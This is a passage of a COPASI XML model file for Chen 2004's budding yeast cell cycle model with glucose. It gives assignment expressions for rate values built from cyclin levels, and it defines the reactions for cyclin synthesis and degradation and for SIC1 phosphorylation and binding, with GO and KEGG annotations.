<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:21Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd2c1],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1n3],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN3],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1k2],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BCK2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1n2],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1b5],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ec1b2],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>))
</Expression>
</ModelValue>
<ModelValue key="ModelValue_168" name="Vd2f6" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_168">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:24Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd2f6],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6n3],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN3],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6k2],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BCK2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6n2],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6b5],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ef6b2],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>))
</Expression>
</ModelValue>
<ModelValue key="ModelValue_169" name="Vppc1" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_169">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:45Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kppc1],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_170" name="Vppf6" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_170">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:29:58Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kppf6],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_171" name="F" simulationType="assignment">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_171">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-03-16T15:50:19Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
exp(-<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mu],Reference=Value>*<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[D],Reference=Value>)
</Expression>
</ModelValue>
<ModelValue key="ModelValue_172" name="amount to particle factor" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_172">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-03-16T15:51:14Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_173" name="1stDivisionTime" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_173">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-03-16T16:10:40Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_174" name="mu2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_174">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-05-07T16:15:49Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_175" name="T0" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_175">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:50Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_176" name="Period" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_176">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T13:49:41Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_177" name="KmGLU" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_177">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:21:08Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_178" name="GLUconsumed" simulationType="ode">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_178">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2011-02-14T17:55:14Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Growth],Reference=Flux>
</Expression>
</ModelValue>
<ModelValue key="ModelValue_179" name="quantity_1" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_179">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2011-02-21T01:11:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
</ListOfModelValues>
<ListOfReactions>
<Reaction key="Reaction_63" name="Growth" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_63">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-05-07T15:16:10Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0016049" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_159" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_119" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_119" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4163" name="k" value="0.0077"/>
<Constant key="Parameter_4164" name="Kmsub" value="0.001"/>
</ListOfConstants>
<KineticLaw function="Function_141">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_775">
<SourceParameter reference="Metabolite_119"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_771">
<SourceParameter reference="ModelValue_174"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_777">
<SourceParameter reference="Metabolite_159"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_779">
<SourceParameter reference="ModelValue_177"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_62" name="Synthesis of CLN2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_62">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:kegg.pathway:sce04110" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_97" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_141" stoichiometry="1"/>
<Modifier metabolite="Metabolite_119" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4139" name="ksn2_p" value="1"/>
<Constant key="Parameter_4140" name="ksn2_p_p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_48">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_366">
<SourceParameter reference="Metabolite_119"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_370">
<SourceParameter reference="Metabolite_141"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_368">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_371">
<SourceParameter reference="ModelValue_137"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_375">
<SourceParameter reference="ModelValue_138"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_61" name="Degradation of CLN2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_61">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_97" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4141" name="kdn2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_49">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_369">
<SourceParameter reference="Metabolite_97"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_373">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_365">
<SourceParameter reference="ModelValue_98"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_60" name="Synthesis of CLB2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_60">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_89" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_121" stoichiometry="1"/>
<Modifier metabolite="Metabolite_119" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4142" name="ksb2_p" value="1"/>
<Constant key="Parameter_4143" name="ksb2_p_p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_50">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_358">
<SourceParameter reference="Metabolite_119"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_362">
<SourceParameter reference="Metabolite_121"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_360">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_364">
<SourceParameter reference="ModelValue_126"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_367">
<SourceParameter reference="ModelValue_127"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_59" name="Degradation of CLB2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_59">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_89" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4144" name="Vdb2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_51">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_361">
<SourceParameter reference="Metabolite_89"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_357">
<SourceParameter reference="ModelValue_155"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_378">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_58" name="Synthesis of CLB5" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_58">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_93" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_141" stoichiometry="1"/>
<Modifier metabolite="Metabolite_119" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4145" name="ksb5_p" value="1"/>
<Constant key="Parameter_4146" name="ksb5_p_p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_52">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_350">
<SourceParameter reference="Metabolite_119"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_354">
<SourceParameter reference="Metabolite_141"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_352">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_356">
<SourceParameter reference="ModelValue_128"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_359">
<SourceParameter reference="ModelValue_129"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_57" name="Degradation of CLB5" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_57">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0008054" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_93" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4147" name="Vdb5" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_53">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_353">
<SourceParameter reference="Metabolite_93"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_349">
<SourceParameter reference="ModelValue_154"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_363">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_56" name="Synthesis of SIC1" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_56">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_143" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_151" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4148" name="ksc1_p" value="1"/>
<Constant key="Parameter_4149" name="ksc1_p_p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_54">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_346">
<SourceParameter reference="Metabolite_151"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_344">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_348">
<SourceParameter reference="ModelValue_131"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_351">
<SourceParameter reference="ModelValue_132"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_55" name="Phosphorylation of SIC1" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_55">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.22" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004693" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006468" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_143" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_145" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4150" name="Vkpc1" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_55">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_347">
<SourceParameter reference="Metabolite_143"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_343">
<SourceParameter reference="ModelValue_158"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_342">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_54" name="Dephosphorylation of SIC1" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_54">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.1.3.48" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0004721" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006470" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_145" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_143" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4151" name="Vppc1" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_56">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_345">
<SourceParameter reference="Metabolite_145"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_341">
<SourceParameter reference="ModelValue_169"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_339">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_53" name="Fast Degradation of SIC1P" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_53">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_145" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4152" name="kd3c1" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_57">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_355">
<SourceParameter reference="Metabolite_145"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_336">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_338">
<SourceParameter reference="ModelValue_81"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_52" name="Assoc. of CLB2 and SIC1" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_52">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005515" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043623" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_89" stoichiometry="1"/>
<Substrate metabolite="Metabolite_143" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_37" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4153" name="kasb2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_58">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_340">
<SourceParameter reference="Metabolite_89"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_331">
<SourceParameter reference="Metabolite_143"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_333">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_335">
<SourceParameter reference="ModelValue_64"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_51" name="Dissoc. of CLB2/SIC1 complex" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_51">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0043624" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_37" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_89" stoichiometry="1"/>
<Product metabolite="Metabolite_143" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4154" name="kdib2" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_59">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_334">
<SourceParameter reference="Metabolite_37"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_329">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_330">
<SourceParameter reference="ModelValue_91"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_50" name="Assoc. of CLB5 and SIC1" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_50">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005515" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043623" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_93" stoichiometry="1"/>
<Substrate metabolite="Metabolite_143" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_29" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
